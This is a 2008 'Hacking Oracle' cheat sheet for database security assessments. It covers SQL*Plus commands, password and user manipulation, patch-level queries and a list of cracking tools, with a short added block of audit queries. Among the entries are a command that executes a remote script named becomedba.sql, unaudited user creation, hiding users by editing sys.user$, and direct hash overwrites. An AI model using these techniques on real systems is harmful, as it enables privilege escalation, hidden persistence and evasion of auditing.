
Oracle Cheat SQLPlus Commands

The document provides information on SQL*Plus commands, different ways to change Oracle passwords, create Oracle users, get the patch level, and useful tools and links for Oracle security assessments. It lists SQL*Plus commands like connecting, running scripts, and formatting output. It also describes methods for altering passwords with SQL statements, updating password hashes directly in the data dictionary, and creating roles and users with grants. Patch levels can be obtained using opatch or querying the database. Useful tools listed crack passwords, analyze listeners, search databases, and control TNS listeners.

Uploaded by

Simo M Bentaleb
Copyright
© Attribution Non-Commercial (BY-NC)

SQL*Plus Commands (not always supported in other clients like TOAD, SQL*Navigator)

Connect with easy connect (works only with Oracle 10g/11g clients):
sqlplus dbsnmp/dbsnmp@192.168.2.112:1521/orcl

SQL*Plus-Commands:
@http://www.orasploit.com/becomedba.sql    -- execute a SQL script from an HTTP server (FTP is also possible)
show parameter                             -- show all parameters of the database
show parameter audit                       -- show audit settings
set term off                               -- disable terminal output
set term on                                -- enable terminal output
set heading off                            -- disable headlines
set pagesize 0                             -- disable pagesize
set timing on                              -- show execution time
set autocommit on                          -- commit everything after every command (!dangerous!)
host cmd.exe /c 0wned > c:\rds8.txt        -- run OS commands from sqlplus (on the client); instead of host, the shortcuts ! (unix) or $ (Windows) are also possible
set serveroutput on                        -- enable output from dbms_output
spool c:\myspool.txt                       -- create a logfile of the SQL*Plus session called myspool.txt (disable: spool off)
desc utl_http                              -- show package specification of utl_http
desc all_users                             -- show view specification of all_users

Different ways to change Oracle Passwords:

With SQL*Plus Password cmd: password system;    -- Password not sent in cleartext
With Alter user cmd: alter user system identified by rds2008;    -- Password sent in cleartext over the network
With Alter user cmd: alter user system identified by values '737B466C2DF536B9';    -- Set a password hash directly
With grant: grant connect to system identified by rds2008;    -- Password sent in cleartext over the network
With update: update sys.user$ set password = '737B466C2DF536B9' where name='SYSTEM';    -- Unsupported, not auditable, flush of the dictionary cache necessary (alter system flush shared_pool;)

Create Oracle User:

With create user cmd: create user user1 identified by rds2008; grant dba to user1;    -- Password sent in cleartext over the network
With create role cmd: create role user1 identified by rds2008; update sys.user$ set type#=1 where name='USER1';    -- Create a role and change the type. Not audited
With grant: grant dba to user1 identified by rds2008;    -- Privilege granted, user will be created if not existing
With grant: grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4;    -- Password sent in cleartext over the network
Invisible User: update sys.user$ set type#=2 where name='USER1';    -- Hide a user in the views dba_users/all_users, no view modification necessary

Get Patch Level:

Get Patchlevel via opatch: opatch lsinventory;    -- Get the patchlevel via opatch (on DB server, OS level)
Get Patchlevel via SQL: select * from dba_registry_history;    -- Get last CPU applied
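
The direct sys.user$ updates listed in the password and user sections above are marked as unsupported and not audited, so a review has to compare the base table with the views built on it. The queries below are an added example, not part of the original cheat sheet; they assume the 10g/11g dictionary layout (type# 0 = role, 1 = user) and an account with SELECT on sys.user$ and the DBA_ views.

```sql
-- Added audit example, not part of the original cheat sheet.
-- Assumption: 10g/11g dictionary layout (sys.user$.type# 0 = role, 1 = user).
-- Run as SYS or as an account with SELECT on sys.user$ and the DBA_ views.

-- 1. Principals that exist in the base table but are missing from both
--    DBA_USERS and DBA_ROLES (for example a row whose type# was set to 2).
select u.user#, u.name, u.type#, u.ctime
  from sys.user$ u
 where u.name not in ('PUBLIC', '_NEXT_USER')
   and not exists (select 1 from dba_users d where d.username = u.name)
   and not exists (select 1 from dba_roles r where r.role = u.name);

-- 2. Password-protected roles. A role created with "identified by" is the
--    starting point of the create-role / type# change, so review each one.
select role, password_required
  from dba_roles
 where password_required <> 'NO';

-- 3. Audit settings. audit_sys_operations must be TRUE for statements
--    issued as SYSDBA/SYSOPER to reach the OS audit trail.
select name, value
  from v$parameter
 where name in ('audit_trail', 'audit_sys_operations');

-- 4. Accounts and roles holding direct object privileges on the table
--    that stores the password hashes and the type# column.
select grantee, privilege, grantable
  from dba_tab_privs
 where owner = 'SYS'
   and table_name = 'USER$';
```

Any row returned by query 1 deserves investigation, since neither view will ever show that principal.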

Useful Tools / Links:

checkpwd: http://www.red-database-security.com/software/checkpwd.html    -- fastest multiplatform Oracle dictionary password cracker
woraauthbf: http://soonerorlater.hu/download/woraauthbf_0.2.zip    -- fastest Oracle Brute Force cracker
anapassword.sql: http://www.red-database-security.com/scripts/anapassword.sql    -- get a list of application password + type
dbgrep.sql: http://www.red-database-security.com/scripts/dbgrep.sql    -- search for a specific string in the database
analistener.sql: http://www.red-database-security.com/scripts/analistener.sql    -- analyse Oracle listener log
tnscmd: http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd    -- control unprotected TNS Listener without Oracle Client
sidguess: http://www.red-database-security.com/software/sidguess.zip    -- fastest Oracle dictionary password cracker
Oracle Assessment Kit: http://www.databasesecurity.com/dbsec/OAK.zip    -- useful tools, e.g. to exploit the alter session bug
Oracle Instant Client: http://www.oracle.com/technology/software/tech/oci/instantclient/index.html    -- Oracle Instant Client
Oracle SQL Developer: http://www.oracle.com/technology/software/products/sql/index.html    -- GUI Tool for Oracle in Java
Backtrack 2: http://www.remote-exploit.org    -- Linux Live CD with many Oracle Security Tools

Hacking Oracle - www.red-database-security.com - Version 1.5.0 - 29-Jan-2008
